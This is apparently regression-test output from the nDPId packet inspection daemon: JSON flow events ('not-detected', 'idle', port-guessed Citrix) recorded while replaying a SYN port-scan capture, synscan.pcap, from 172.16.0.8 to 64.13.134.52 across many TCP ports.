-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3527,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3527,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7627,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7627,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3546,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3546,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 